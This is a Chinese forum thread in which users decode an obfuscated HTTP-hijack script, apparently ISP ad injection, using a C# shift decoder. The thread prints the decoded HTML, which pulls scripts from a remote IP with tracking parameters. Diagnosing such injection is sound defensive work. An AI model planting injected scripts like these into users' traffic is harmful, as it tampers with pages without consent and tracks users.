大家帮我看下这个HTTP劫持脚本是如何起作用的?

应该是从某个邮箱里取得图片并显示了,找找这个脚本怎么获得的,监视流量看看,拷到本地运行它,看charcode后生成了啥

解决方案 »

  1.   

    刚刚写了个C#程序模拟了一下,C#程序代码如下:using System;
    using System.Collections.Generic;
    using System.Linq;
    using System.Text;namespace ConsoleApplication1
    {
        class Program
        {
            static void Main(string[] args)
            {
                string a="=iunm?=ifbe?=mjol!sfm>#tuzmftiffu#!uzqf>#ufyu0dtt#!isfg>#iuuq;00223/5/34/215;95903/dtt#?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00223/5/34/215;9590vujm/kt#?=0tdsjqu?=0ifbe?=cpez!je>#c#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op?=0cpez?=tdsjqu!tsd>#iuuq;00223/5/34/215;9590b`ud/kt@beje>318111'uddb>NUN5NUN{O{Z{PUR>'vsjq>211/78/89/75";
                string b = "'tuqu>1'fequ>1'psmv>bIS1dEpwM4e4ez6jZXmleT6kc31w'bpsmv>bIS1dEpwM{FyNj51MkJ{MkFxOEp5OEhwNkB4NEBxMx>>'tqje>413428981'bsfb>1'q2bsn>341'q3bsn>491'q4bsn>21'q5bsn>4'q6bsn>4'q7bsn>2'bqqe>1'ibtDpvou>1'ibtXijufVtfs>1'npuo>485:7446:1'tbbt>648116423'q8bsn>2'q9bsn>1'qtbe>4343379435'buje>2'qbbu>1'bbje>1'jtbb>1'fowt>1'dlut>2537368821#?=0tdsjqu?=0iunm?";            string c = a + b;
                string d = null;            char[] array = c.ToCharArray();            for (int i = 0; i < c.Length; i++)
                {
                    int tempcode = char.ConvertToUtf32(c, i) - 1;
                    d = d + char.ConvertFromUtf32(tempcode);
                }            Console.WriteLine(d);
            }
        }
    }
    写完后运行,把得到的结果的格式整理以后,得出以下的结果。看来还需要进一步跟踪。
    <html>
    <head>
    <link rel="stylesheet" type="text/css" href="http://112.4.23.104:848/2.css">
    <script type="text/javascript" src="http://112.4.23.104:848/util.js">
    </script>
    </head><body id="b" rightMargin=0 topMargin=0 leftMargin=0 scroll=no>
    </body><script src="http://112.4.23.104:848/a_tc.js?adid=207000&tcca=MTM4MTMzNzYzOTQ=
    &urip=100.67.78.64&stpt=0&edpt=0&orlu=aHR0cDovL3d3dy5iYWlkdS5jb20v&aorlu=aHR0cDo
    vLzExMi40LjIzLjEwNDo4NDgvMjA3MDAwLw==&spid=302317870&area=0&p1arm=230&p2arm=380&
    p3arm=10&p4arm=3&p5arm=3&p6arm=1&appd=0&hasCount=0&hasWhiteUser=0&motn=374963359
    0&saas=537005312&p7arm=1&p8arm=0&psad=3232268324&atid=1&paat=0&aaid=0&isaa=0&env
    s=0&ckts=1426257710">
    </script></html>
      

  2.   


    本来只是想让大家看着帮忙参详一下到底是怎么回事的,因为我做系统的时候非常小心,应该不太可能中病毒,平时都是在VHD差分磁盘环境中工作。刚刚在百度上查了下“112.4.23.104”这个IP地址,确定为就是南京移动的,我用的就是移动的宽带,这样可不可以这个HTTP劫持就是移动所为的呢?
      

  3.   

    还用C#来解码。。多学下js,将
    document.write(i(d,c));改为
    alert(i(d,c));就看到源代码了
    这个一般是你isp提供商插入的广告代码的多。。